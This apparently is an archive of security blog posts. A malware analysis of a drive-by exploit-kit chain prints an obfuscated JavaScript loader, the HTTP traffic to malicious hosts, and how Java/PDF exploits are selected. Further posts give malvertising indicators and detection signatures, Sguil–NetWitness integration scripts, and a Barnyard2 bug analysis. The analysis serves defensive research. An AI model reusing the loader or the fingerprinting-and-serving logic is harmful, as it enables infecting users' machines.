JiPaqPdrPJ2PdrPk3PJ/PJ=PkgPkOPkaPkdPkiPkiPkOPkOPkJPk2Pk2PadParPdkPd=Pd/PJsPJiPkgPadPdJPJ/PdkPJ/PJaPJ/PJsPJ/Pd=Pd/PkMPJ2PJ/PJ=PJ=PJiPJqPkmPadParPddPJ/PJ=Pd=PJ2PkgPadPkOPadParPJ2PJiPJ/PJdPJ2Pd=PkgPadPkOPadParPaiPkkP=iPaiPkkP=kPa3PJ/PJJPdaPJOPJgPJiPaiPkkP=iPaaPa/Pa/PkmPrMPrMPrMPdgPrMPrMPJ=PJ3PJkPdiPJgPJiPJqPd=PaqPddPdaPJ/Pd=PJiPa2PdiPJqPJiPdkPJkPJOPdrPJiPa2PaaPaiPkkP=kPJOParPJ2PdaPJiPJJPkgPadPJ2Pd=Pd=PdrPaiPkkP=OPaiPkaP=JPaiPkaP=JPd=PdaPJOPJkPJmPJ/PJqPJdPaqPJkPJ3PJgPadParPd=PJOPdaPJdPJiPd=PkgPadPi3PJaPJsPJOPJqPJmPadPaiPkkP=iPaiPkkP=kPJ/PJgPJdParPdkPdaPJkPkgPadPJ2Pd=Pd=PdrPkMPa3Pa3PJkPkkPJgPJiPd=PdaPJ/PJkPdkPaqPJqPJiPd=Pa3PJaPJ=PJaPa3PdrPJ/Pd2PJiPJsPaqPJdPJ/PJJPadParPJaPJ3PdaPJ=PJiPdaPkgPadPkrPadParPaiPkkP=iPaiPkkP=kPa3PJOPaiPkkP=iPaaPa/Pa/PkmPrMPrMPrM';var jlgkds='C9H6fshixZO4/NBSIeX:=PapknRrc1D0vM3A.T&gQGJ82K?t7yYVbu_-Wwqo%jUmElLdzF5';var GaJhym='s/0JF%4zlEe=Y5mVTxIK6wuDjQ-t?OgrASkMfhB9.Xn2avo:dGL&HWU7cyR1PC_bqN8Zp3i';var _jNcLS='';var TOZI;var DdC;for(TOZI=0;TOZI-1){ _jNcLS+=jlgkds.charAt(DdC);}}JXzn_(uhbnP(_jNcLS));

Now this JavaScript does just look like a lot of junk, but it is pretty easy to deobfuscate it using tools like the FireFox FireBug extention or great online tools like JSUnpack. We have submitted the following JavaScript to JSUnpack and the report can be viewed here:
http://jsunpack.jeek.org/dec/go?report=7bff4237dbcb5448c08c5c3b40f4c1d0a97c889b

The output we are concerned with about this report is write here, this is what ends up being written into the HTML document. Please do not go to the below URL’s unless you are attempting to perform research within your sandboxes or sacrificial lambs:

' style='visibility:hidden;' width='1' height='1'>

Now, at this point the client will perform requests to the URI’s in the two IFRAME’s along with the gif. First we will look at the request to the stats_js_e.php file which is purely used for tracking purposes. The id= variable that is passed to it is a simple UNIX timestamp. We have removed it from our examples here (but it is obviously still available in the jsunpack report if you care to see it).

GET /stats_js_e.php?id= HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://us.mc1117.mail.yahoo.com/mc/md.php?en=CP1252&v=1
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; )
Host: c3metrics.net
Connection: Keep-Alive

As you can see, the response to this will not contain anything as it is just for statistics and tracking purposes:

HTTP/1.1 200 OK
Server: nginx/0.8.45
Date: Mon, 02 Aug 2010 
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Content-Length: 0

Next we will look at the request to the wilstose.co.cc host, this is a request to an intermediary system that will produce a redirect to the actual drive by site:

GET /zmtrc.php?pq=cust1 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://us.mc1117.mail.yahoo.com/mc/md.php?en=CP1252&v=1
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; )
Host: wilstose.co.cc
Connection: Keep-Alive

The response contained within includes the actual link to the live running drive by site contained within a hidden IFRAME:

HTTP/1.1 200 OK
Server: nginx/0.8.45
Date: Mon, 02 Aug 2010 
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Content-Length: 133

This will now cause the client to perform a request against the bbcxq.com site:

GET /ar/putyq.php HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://wilstose.co.cc/zmtrc.php?pq=cust1
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; )
Host: bbcxq.com
Connection: Keep-Alive

The response to this request will again serve up some obfuscated data that has to be de obfuscated using the script refrenced in the response (in this case it is named rnrt.js):

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 1615
Content-Type: text/html
Date: Mon, 02 Aug 2010 
Keep-Alive: timeout=1, max=100
Server: Apache/2
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.14





(EG)(NB)(X_)
(YU)(DJ)(KJ)

(P_)(MT)(GZ)

This response causes the client to ask the server for the contents of the rnrt.js file, so the next request is made:

GET /ar/rnrt.js HTTP/1.1
Accept: */*
Referer: http://bbcxq.com/ar/putyq.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; )
Host: bbcxq.com
Connection: Keep-Alive

This delivers back the following response which has the JavaScript that will deobfuscate the data held within the hidden HTML input tag with the id of “GVaV”:

HTTP/1.1 200 OK
Accept-Ranges: bytes
Connection: Keep-Alive
Content-Length: 652
Content-Type: application/javascript
Date: Mon, 02 Aug 2010 
ETag: 
Keep-Alive: timeout=1, max=99
Last-Modified: Mon, 02 Aug 2010 
Server: Apache/2
Vary: Accept-Encoding,User-Agent

var _ryf=new Object();function hmww_(id){return (_ryf[id])?_ryf[id]:_ryf[id]=document.getElementById(id);};function OUWD(){var ZpG=String;var fnuk=Math;var pbRy='floorwuBYZXz'.replace(/[wuBYZXz]/g,'');var vPkaT=16;var YQu_='fromCnSTzBk'.replace(/[nSTzBk]/g,'')+"harCo"+"VwAdenygv".substr(3,2);var JbG=256;var Bau_=ZpG("evhwv".substr(0,2)+"al");var ru_bz=this;var GVaV=hmww_"GVaV").value;GVaV=GVaV.replace(/[\~@#\!]/g,'');var U_CZ=[471,541,759,116];var zRQQ="";for(var gn_=0;gn_
Upon the execution of this JavaScript, this will cause the client to POST back information to the server about what type of exploits to serve up. The JavaScript attempts to determine if the host had Acrobat, or Java (among other things) installed and then the appropriate malicious PDF or Java class will be served up to the client.
POST /ar/putyq.php HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://bbcxq.com/ar/putyq.php
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; )
Host: bbcxq.com
Content-Length: 40
Connection: Keep-Alive
Cache-Control: no-cache
id=53104c390ee1ebc861a1938a5958ea63%26np
The values at the end of the ID is what tells the drive by what types of exploits to serve up. In this case the “np” at the end means “no java” and “yes pdf”. However, the ID’s can be the following values:
np = no java,  yes pdf
jp = yes java, yes pdf
n  = no java,  no pdf
j  = yes java, no pdf
The response to this POST contains the following obfuscated data that is processed and deobfuscated again by the rnrt.js file:
HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 9310
Content-Type: text/html
Date: Mon, 02 Aug 2010 
Keep-Alive: timeout=1, max=100
Server: Apache/2
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.14




(LR)(X_)(YP)
(BH)(TJ)(SY)

(GI)(VN)(_G)


This will cause the client to now make a request for the malicious PDF:
GET /ar/k_fgvu/_tvmwh.pdf HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, pplication/msword, */*
Referer: http://bbcxq.com/ar/putyq.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; )
Host: bbcxq.com
Connection: Keep-Alive
If the client is then vulnerable to the contents of this PDF, they may become infected based upon the actual payload being served up by the drive by site. This is dependant generally upon the antivirus signatures for the current malware being distributed, unfortunately the detection rates are not nearly as high as you generally may think:

http://www.virustotal.com/estadisticas.html
Hopefully if you have read this you have found it to be of some use.

Massive Advertising Server Compromise/Socially Engineered By The RBN

Eoin Miller — Wed, 03 Mar 2010 03:06:55 +0000

We have identified several major websites (buy.com, cnbc.com, digg.com, evite.com and msn.com just to name a few) using the advertising services of malicious servers that are using Acrobat PDF and Java exploits to force the download and installation of fake antivirus software. Analysis from SysAdMini @ www.malwaredomainlist.com has informed us the sites are all using the NeoSploit drive-by kit. After further reseach, we found that Jiri Sejtko from Avast! has actually documented this and written up a great blog entry about this back on Feb 18th, 2010. It is unbelievable that online advertisers the likes of yieldmanager.com, fimserve.com, advertangel.com, bannerimg.com, jambovideonetwork.com, myspace.com, zedo.com, vestraff.com and others allowed this to occur and even thrive for the better part of a month. The host names hosting the drive-by and fake antivirus software that we have discovered so far are:

google.analytics.com.bazqrhafrrh.info
google.analytics.com.bidxctvqvwrw.info
google.analytics.com.byuigracdnjj.info
google.analytics.com.ckzqfrxaxihi.info
google.analytics.com.cvybexpnqhlx.info
google.analytics.com.dbvvwrkgycfa.info
google.analytics.com.dcghkoixsagu.info
google.analytics.com.dfxlhdyffzho.info
google.analytics.com.dwldxeqavts.info
google.analytics.com.dygpcewrjnw.info
google.analytics.com.eliyisgtkaj.info
google.analytics.com.eututrywxvhd.info
google.analytics.com.ezqaxnmsbs.info
google.analytics.com.friavuzpsvxc.info
google.analytics.com.fywthroeasx.info
google.analytics.com.gopbaqvgprvh.info
google.analytics.com.hjvcnunmtzc.info
google.analytics.com.hnstetlseuop.info
google.analytics.com.hzlyaejcvmat.info
google.analytics.com.inxvwrxogrc.info
google.analytics.com.jestywtvadgj.info
google.analytics.com.jgvsjnhmvngn.info
google.analytics.com.jjotqkhqymp.info
google.analytics.com.jklnznqvztu.info
google.analytics.com.jtmqypcgt.info
google.analytics.com.jttyhhvcxmbz.info
google.analytics.com.jvoamkvyxv.info
google.analytics.com.kijksoeohxze.info
google.analytics.com.kmpbfdtknwsh.info
google.analytics.com.kzpkpehthbgn.info
google.analytics.com.lsvoenxxyya.info
google.analytics.com.mnuzqxerjufm.info
google.analytics.com.muhrlwuzyaly.info
google.analytics.com.nbtislvidmq.info
google.analytics.com.nlfgjehbotwi.info
google.analytics.com.noltvoqmhoce.info
google.analytics.com.oaofmsckue.info
google.analytics.com.ocryspyjvkh.info
google.analytics.com.omvdbdcknpct.info
google.analytics.com.pmxjpigimsdv.info
google.analytics.com.prtrkmxkpctw.info
google.analytics.com.pzignbfxspou.info
google.analytics.com.qlgkmytdvyjx.info
google.analytics.com.rimofoixaf.info
google.analytics.com.rmkbyklbhawd.info
google.analytics.com.rtkffbmmgkpw.info
google.analytics.com.rxflhciirups.info
google.analytics.com.sphamifoaqpx.info
google.analytics.com.tbxierkoqze.info
google.analytics.com.tdrfhdzxyb.info
google.analytics.com.tidawgeihqch.info
google.analytics.com.tklaxlxvedkt.info
google.analytics.com.tluaweyermg.info
google.analytics.com.uentfkblzpxx.info
google.analytics.com.uoncvsqcuclx.info
google.analytics.com.uuyvsrbtpjhl.info
google.analytics.com.uwbhpcrydgta.info
google.analytics.com.vgmhlwrixzxz.info
google.analytics.com.vujpgvscrjbk.info
google.analytics.com.vwrvqmvrvjwi.info
google.analytics.com.wwkzrjfuhmjg.info
google.analytics.com.wxrzufdrzzn.info
google.analytics.com.xewffvnixdyk.info
google.analytics.com.xkduqnxfpnfg.info
google.analytics.com.xnboetuqunld.info
google.analytics.com.yfguydudorip.info
google.analytics.com.yggxvnwumcqv.info
google.analytics.com.yhaidebpfltr.info
google.analytics.com.yynspckhyebi.info
google.analytics.com.zejdcqsoglao.info
google.analytics.com.zelhnalbivd.info
google.analytics.com.zsrsjnihnb.info
google.analytics.com.zugponkeqtzz.info

All of these host names resolved to the following IP addresses at this time:

69.174.245.147
69.174.245.148
69.174.245.150
72.51.41.155
75.125.183.50
174.142.53.148

We have been observing this for a few days and have been checking our repository of traffic and this goes back even further than Feb 15th, 2010. The signature that will trip on the download of the malware more often than not is this one:

ET POLICY Binary Download Smaller than 1 MB Likely Hostile
http://doc.emergingthreats.net/2007671

Once a client is infected, the following signatures trip:

ET TROJAN Potential FakeAV HTTP GET Check-IN (/check)
http://doc.emergingthreats.net/2010597

ET TROJAN Potential FakeAV HTTP POST Check-IN (?r=)
http://doc.emergingthreats.net/2010594

ET USER_AGENTS Suspicious User Agent (Microsoft Internet Explorer)
http://doc.emergingthreats.net/2002400

The infected client will attempt to check-in to the follwing IP Address/hostname:

79.135.152.5 – avgroupwebsite.com
195.88.190.54 – av-command.com/av-crew.net

This campaign seems to have been very effective and we know of thousands of hosts that have been exploited by this campaign.

Integrating NetWitness and Sguil – Take Two

Eoin Miller — Fri, 15 Jan 2010 23:45:50 +0000

We have finished up our first round of testing against the modified version of the Sguil client (we have modified the 0.7.0 CVS version). Using the alert information displayed in the Sguil client we create a query and feed it into the NetWitness API through a vbscript which calls explorer.exe and passes it a NetWitness URL. When you install NetWitness Investigator, it registers the nw:// as a protocol within the OS. This URL is the API/method by which you can use alerting from other products to find specific sessions, ip’s or timeframes of traffic to review in any combination.

To do this, we first modified the Xscript section of sguil.tk and removed the transcript and wireshark options as we are now relying upon NetWitness for pcap capture instead of daemonlogger/sancp/tcpdump etc:

# Xscript Menu
set eventIDMenut [ menu .eventIDMenut -background $SELECTBACKGROUND -foreground $SELECTFOREGROUND \
  -activeforeground $SELECTBACKGROUND -activebackground $SELECTFOREGROUND -tearoff 0 ]
$eventIDMenut add command -label "Event History" -command "GetEventHistory"
$eventIDMenut add command -label "NetWitness Src -> Dst" -command "NetWitnessEvent from"
$eventIDMenut add command -label "NetWitness Dst -> Src" -command "NetWitnessEvent to"

You can see that we are calling the command NetWitnessEvent and passing it a value of from or to. The reason for this is that events that are triggered list the source and destination IP address for the particular packet that caused the alert. However, NetWitness is session aware, so you may need to query using the source address as the destination and vice versa. This is calling the NetWitnessEvent function that we have added to lib/extdata.tcl:

proc NetWitnessEvent { direction } {
    global ACTIVE_EVENT SERVERHOST XSCRIPT_SERVER_PORT DEBUG CUR_SEL_PANE XSCRIPTDATARCVD
    global socketWinName SESSION_STATE WIRESHARK_STORE_DIR WIRESHARK_PATH
    if {!$ACTIVE_EVENT} {return}
    set selectedIndex [$CUR_SEL_PANE(name) curselection]
    set sidcidList [split [$CUR_SEL_PANE(name) getcells $selectedIndex,alertID] .]
    set cnxID [lindex $sidcidList 1]
    set sensorID [lindex $sidcidList 0]
    set proto [$CUR_SEL_PANE(name) getcells $selectedIndex,ipproto]
    set srcIP [$CUR_SEL_PANE(name) getcells $selectedIndex,srcip]
    set srcPort [$CUR_SEL_PANE(name) getcells $selectedIndex,srcport]
    set dstIP [$CUR_SEL_PANE(name) getcells $selectedIndex,dstip]
    set dstPort [$CUR_SEL_PANE(name) getcells $selectedIndex,dstport]
    if { $CUR_SEL_PANE(format) == "SSN" } {
       set timestamp [$CUR_SEL_PANE(name) getcells $selectedIndex,starttime]
    } else {
       set timestamp [$CUR_SEL_PANE(name) getcells $selectedIndex,date]
    }   
    set future [clock scan "2 minute" -base [clock scan $timestamp -gmt 1]]
    set past   [clock scan "-2 minute" -base [clock scan $timestamp -gmt 1]]
    set future [clock format $future -format {%Y-%m-%d+%H:%M:%S} -gmt 1]
    set past [clock format $past -format {%Y-%m-%d+%H:%M:%S} -gmt 1]
    set future [regsub -all -expanded {[\:]} $future {%3A}]
    set past [regsub -all -expanded {[\:]} $past {%3A}]
    if { $proto == "6" } {
        if { $direction == "from" } {
            exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=TCP+%7C%7C+$srcIP%3A$srcPort+-%3E+$dstIP%3A$dstPort&time=$past+to+$future&view=session&where=ip.src%3D$srcIP+%26%26+tcp.srcport%3D$srcPort+%26%26+ip.dst%3D$dstIP+%26%26+tcp.dstport%3D$dstPort"
        }
        if { $direction == "to" } {
            exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=TCP+%7C%7C+$dstIP%3A$dstPort+-%3E+$srcIP%3A$srcPort&time=$past+to+$future&view=session&where=ip.src%3D$dstIP+%26%26+tcp.srcport%3D$dstPort+%26%26+ip.dst%3D$srcIP+%26%26+tcp.dstport%3D$srcPort"
        }
    }
    if { $proto == "17" } {
     if { $direction == "from" } {
         exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=UDP+%7C%7C+$srcIP%3A$srcPort+-%3E+$dstIP+%3A+$dstPort&time=$past+to+$future&view=session&where=ip.src%3D$srcIP+%26%26+udp.srcport%3D$srcPort+%26%26+ip.dst%3D$dstIP+%26%26+udp.dstport%3D$dstPort"
     }
     if { $direction == "to" } {
         exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=UDP+%7C%7C+$dstIP%3A$dstPort+-%3E+$srcIP+%3A+$srcPort&time=$past+to+$future&view=session&where=ip.src%3D$dstIP+%26%26+udp.srcport%3D$dstPort+%26%26+ip.dst%3D$srcIP+%26%26+udp.dstport%3D$srcPort"
     }
    }
    if { $proto == "1" } {
        if { $direction == "from" } {
            exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=ICMP+%7C%7C+$srcIP+-%3E+$dstIP&time=$past+to+$future&view=session&where=ip.src%3D$srcIP+%26%26+ip.dst%3D$dstIP+%26%26+ip.proto%3D1"
        }
        if { $direction == "to" } {
            exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=ICMP+%7C%7C+$dstIP+-%3E+$srcIP&time=$past+to+$future&view=session&where=ip.src%3D$dstIP+%26%26+ip.dst%3D$srcIP+%26%26+ip.proto%3D1"
        }
    }
}

This function will create different queries based upon protocol type (TCP/UDP/ICMP only currently) and use the source/destination address and source/destination port. It will look for sessions that match those specific values and then automatically open them in NetWitness Investigator:

To replicate the SANCP session type queries, we again modify sguil.tk but this time we modify the IPQuery Menu section:

# IPQuery Menu
set ipQueryMenu [ menu .ipQueryMenu -background $SELECTBACKGROUND -foreground $SELECTFOREGROUND \
  -activeforeground $SELECTBACKGROUND -activebackground $SELECTFOREGROUND -tearoff 0 ]
.ipQueryMenu add cascade -label "Quick Query" -menu $ipQueryMenu.quickMenu
.ipQueryMenu add cascade -label "Advanced Query" -menu $ipQueryMenu.advancedMenu
.ipQueryMenu add cascade -label "Dshield IP Lookup" -menu $ipQueryMenu.dshieldIPMenu
.ipQueryMenu add cascade -label "Nessus Report Lookup" -menu $ipQueryMenu.nessusMenu
.ipQueryMenu add cascade -label "NetWitness Query" -menu $ipQueryMenu.netwitnessMenu

menu $ipQueryMenu.quickMenu -tearoff 0 -background $SELECTBACKGROUND -foreground $SELECTFOREGROUND -activeforeground $SELECTBACKGROUND -activebackground $SELECTFOREGROUND
menu $ipQueryMenu.advancedMenu -tearoff 0 -background $SELECTBACKGROUND -foreground $SELECTFOREGROUND -activeforeground $SELECTBACKGROUND -activebackground $SELECTFOREGROUND
menu $ipQueryMenu.dshieldIPMenu -tearoff 0 -background $SELECTBACKGROUND -foreground $SELECTFOREGROUND -activeforeground $SELECTBACKGROUND -activebackground $SELECTFOREGROUND
menu $ipQueryMenu.nessusMenu -tearoff 0 -background $SELECTBACKGROUND -foreground $SELECTFOREGROUND -activeforeground $SELECTBACKGROUND -activebackground $SELECTFOREGROUND
menu $ipQueryMenu.netwitnessMenu -tearoff 0 -background $SELECTBACKGROUND -foreground $SELECTFOREGROUND -activeforeground $SELECTBACKGROUND -activebackground $SELECTFOREGROUND

$ipQueryMenu.netwitnessMenu add command -label "SrcIP/1 Hour"           -command "NetWitness Src 1"
$ipQueryMenu.netwitnessMenu add command -label "SrcIP(as Dst)/1 Hour"   -command "NetWitness SrcAsDst 1"
$ipQueryMenu.netwitnessMenu add command -label "SrcIP/24 Hours"         -command "NetWitness Src 24"
$ipQueryMenu.netwitnessMenu add command -label "SrcIP(as Dst)/24 Hours" -command "NetWitness SrcAsDst 24"
$ipQueryMenu.netwitnessMenu add command -label "DstIP/1 Hour"           -command "NetWitness Dst 1"
$ipQueryMenu.netwitnessMenu add command -label "DstIP(as Src)/1 Hour"   -command "NetWitness DstAsSrc 1"
$ipQueryMenu.netwitnessMenu add command -label "DstIP/24 Hours"         -command "NetWitness Dst 24"
$ipQueryMenu.netwitnessMenu add command -label "DstIP(as Src)/24 Hours" -command "NetWitness DstAsSrc 24"
$ipQueryMenu.netwitnessMenu add command -label "Src To Dst/1 Hour"      -command "NetWitness SrcToDst 1"
$ipQueryMenu.netwitnessMenu add command -label "Dst To Src/1 Hour"      -command "NetWitness DstToSrc 1"
$ipQueryMenu.netwitnessMenu add command -label "Src To Dst/24 Hours"    -command "NetWitness SrcToDst 24"
$ipQueryMenu.netwitnessMenu add command -label "Dst To Src/24 Hours"    -command "NetWitness DstToSrc 24"
$ipQueryMenu.netwitnessMenu add command -label "Src To Dst/5 Days"      -command "NetWitness SrcToDst 120"
$ipQueryMenu.netwitnessMenu add command -label "Dst To Src/5 Days"      -command "NetWitness DstToSrc 120"
foreach { currentMenu subcommand } { .ipQueryMenu.quickMenu "quick" .ipQueryMenu.advancedMenu "build" } {
....truncated for brevity, everything below is should be as it was when you checked it out of CVS...

You can see we are calling a proc/function called NetWitness and are passing it a variable for which address(es) we are interested in (and if they are source or destination addresses) along with some predefined time periods. You have much better flexibility and control if you actually create these queries within NetWitness directly, but just being able to right click makes for greater ease of use for analysts. This is calling the NetWitnessEvent function that we have added to lib/extdata.tcl:

proc NetWitness { direction hours } {
    global ACTIVE_EVENT SERVERHOST XSCRIPT_SERVER_PORT DEBUG CUR_SEL_PANE XSCRIPTDATARCVD
    global socketWinName SESSION_STATE WIRESHARK_STORE_DIR WIRESHARK_PATH
    if {!$ACTIVE_EVENT} {return}
    set selectedIndex [$CUR_SEL_PANE(name) curselection]
    set sidcidList [split [$CUR_SEL_PANE(name) getcells $selectedIndex,alertID] .]
    set cnxID [lindex $sidcidList 1]
    set sensorID [lindex $sidcidList 0]
    set proto [$CUR_SEL_PANE(name) getcells $selectedIndex,ipproto]
    set srcIP [$CUR_SEL_PANE(name) getcells $selectedIndex,srcip]
    set srcPort [$CUR_SEL_PANE(name) getcells $selectedIndex,srcport]
    set dstIP [$CUR_SEL_PANE(name) getcells $selectedIndex,dstip]
    set dstPort [$CUR_SEL_PANE(name) getcells $selectedIndex,dstport]
    if { $CUR_SEL_PANE(format) == "SSN" } {
       set timestamp [$CUR_SEL_PANE(name) getcells $selectedIndex,starttime]
    } else {
       set timestamp [$CUR_SEL_PANE(name) getcells $selectedIndex,date]
    } 
    if {$hours == 1} {
     set future [clock scan "30 minute" -base [clock scan $timestamp -gmt 1]]
     set past   [clock scan "-30 minute" -base [clock scan $timestamp -gmt 1]]
    } else {
     set hours [expr $hours / 2]
     set future [clock scan "$hours hour" -base [clock scan $timestamp -gmt 1]]
     set past   [clock scan "-$hours hour" -base [clock scan $timestamp -gmt 1]]
    }
    set future [clock format $future -format {%Y-%m-%d+%H:%M:%S} -gmt 1]
    set past [clock format $past -format {%Y-%m-%d+%H:%M:%S} -gmt 1]
    set future [regsub -all -expanded {[\:]} $future {%3A}]
    set past [regsub -all -expanded {[\:]} $past {%3A}]   
    if { $direction == "Src" } {
     exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=ip.src%3D$srcIP&time=$past+to+$future&where=ip.src%3D$srcIP"
    }
    if { $direction == "SrcAsDst" } {
        exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=ip.dst%3D$srcIP&time=$past+to+$future&where=ip.dst%3D$srcIP"
    }
    if { $direction == "Dst" } {
     exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=ip.dst%3D$dstIP&time=$past+to+$future&where=ip.dst%3D$dstIP"
    }
    if { $direction == "DstAsSrc" } {
     exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=ip.src%3D$dstIP&time=$past+to+$future&where=ip.src%3D$dstIP"
    }
    if { $direction == "SrcToDst" } {
     exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=$srcIP+-%3E+$dstIP&time=$past+to+$future&where=ip.src%3D$srcIP+%26%26+ip.dst%3D$dstIP"
    }
    if { $direction == "DstToSrc" } {
         exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=$dstIP+-%3E+$srcIP&time=$past+to+$future&where=ip.src%3D$dstIP+%26%26+ip.dst%3D$srcIP"
    }
}

Now we can right click on IP’s within Sguil and use the alert data to perform these SANCP queries into NetWitness as shown below:

You may have noticed that the nw://’s are being passed to a visual basic script entitled nw.vbs within the analyst accounts home directory. We had some issues with executing long length commands from within TCL and ran into 8.3 filename limitations as well. The vbscript is very simple and uses the run method to execute explorer.exe while passing it the URL we have formed to perform the query in NetWitness Investigator. If NetWitness Investigator is not running, it will open up and prompt you for your authentication credentials. Additionally, if is already open it will just create a tab in the investigator and display you the sessions/reports. The contents of the nw.vbs file are as follows, it may look weird butyou have to escape quotes with quotes when you do vb scripting so it looks like you have gone quote crazy:

Set objShell = Wscript.CreateObject("Wscript.Shell")
Set ArgObj = WScript.Arguments

Cmd = """" & "c:\windows\system32\explorer.exe" & """" & " " & """" & WScript.Arguments.Item(0) & """"

objShell.Run Cmd

Fixing Barnyard2 Duplicate Database Entries With Sguil Output

Eoin Miller — Sat, 12 Dec 2009 03:53:42 +0000

Well the good folks over at SecurixLive.com have already fixed this and a few other little things and rolled it into their latest release of Barnyard2 v1.8-beta1. Go and get it!

We have identified an issue with Barnyard2 version 1.7 build 255 that causes duplicate entries to be created in the Sguil database. The issue was that the entries in the unified2 output from Snort will be read into two seperate lists (AlertList and LogList) as the unified2 log file is processed. Elsewhere in the Barnyard2 code, all the relavent information is stored into a buffer for creating the Sguil database entry for the alert (summary of event) and the log (offending packet) prior to firing off the output logging. The debugging output shows you that the SPECIAL style output is going to be used for the event/packet combo that was pulled out of the unified2 output file:

spi_unified2.c:151: Header: Type=7 (52 bytes)
spi_unified2.c:159: Reading record type=7 (52 bytes)
spi_unified2.c:320: Type: Event -------------------------------------------
spi_unified2.c:322:   sensor_id          = 0
spi_unified2.c:324:   event_id           = 4
spi_unified2.c:326:   event_second       = 1260520646
spi_unified2.c:328:   event_microsecond  = 383469
spi_unified2.c:330:   generator_id       = 1
spi_unified2.c:332:   signature_id       = 2009236
spi_unified2.c:334:   signature_revision = 5
spi_unified2.c:336:   classification_id  = 21
spi_unified2.c:338:   priority_id        = 1
spi_unified2.c:353:   ip_source          = 192.168.1.5
spi_unified2.c:356:   sport_itype        = 57019
spi_unified2.c:359:   ip_destination     = 71.191.147.210
spi_unified2.c:361:   dport_icode        = 80
spi_unified2.c:364:   ip_protocol        = 6
spi_unified2.c:366:   packet_action      = 0
spi_unified2.c:151: Header: Type=2 (244 bytes)
spi_unified2.c:159: Reading record type=2 (244 bytes)
spi_unified2.c:403: Type: Packet ------------------------------------------
spi_unified2.c:405:   sensor_id          = 0
spi_unified2.c:407:   event_id           = 4
spi_unified2.c:409:   event_second       = 1260520646
spi_unified2.c:411:   linktype           = 1
spi_unified2.c:413:   packet_second      = 1260520646
spi_unified2.c:415:   packet_microsecond = 383469
spi_unified2.c:417:   packet_length      = 216
spi_unified2.c:422:   packet             = 18 01 bb 24
decode.c:113: Decoding linktype 1
decode.c:314: Packet!
decode.c:314: caplen: 216    pktlen: 216
decode.c:341: 0:21:9B:69:E0:9 -> 0:18:1:BB:24:4F
decode.c:345: type:0x800 len:0xD8
decode.c:355: IP datagram size calculated to be 202 bytes
decode.c:2648: Packet!
decode.c:2822: IP Checksum: OK
decode.c:2899: IP header length: 20
decode.c:3023: TCP th_off is 5, passed len is 182
decode.c:3103: TCP Checksum: OK
decode.c:3107: tcp header starts at: 0x80dcd9e
spooler.c:655: Firing SPECIAL style (Packet+Event)

So the debugging shows us only firing off once with SPECIAL style (Packet+Event). But if we look at the output presented to STDOUT, we see that the same alert inserted twice into the Sguil server (we have omitted packet contents for brevity):

sguil: sending "RTEVENT 0 1 199 sguil 4 4 {2009-12-11 03:37:26} 1 2009236 5 {ET USER_AGENTS Pigeon.AYX/AVKill Related User-Agent (CTTBasic) } {2009-12-11 03:37:26} 1 trojan-activity 3232235781 192.168.1.5 1203737554 71.191.147.210 6 4 5 0 202 2472 2 0 128 21319 {} {} {} {} {} 57019 80 309364297 2715104879 5 0 24 16425 7600 0 {} {}"
sguil: Received: Confirm 199
sguil: sending "RTEVENT 0 1 200 sguil 4 4 {2009-12-11 03:37:26} 1 2009236 5 {ET USER_AGENTS Pigeon.AYX/AVKill Related User-Agent (CTTBasic) } {2009-12-11 03:37:26} 1 trojan-activity 3232235781 192.168.1.5 1203737554 71.191.147.210 6 4 5 0 202 2472 2 0 128 21319 {} {} {} {} {} 57019 80 309364297 2715104879 5 0 24 16425 7600 0 {} {}"
sguil: Received: Confirm 200

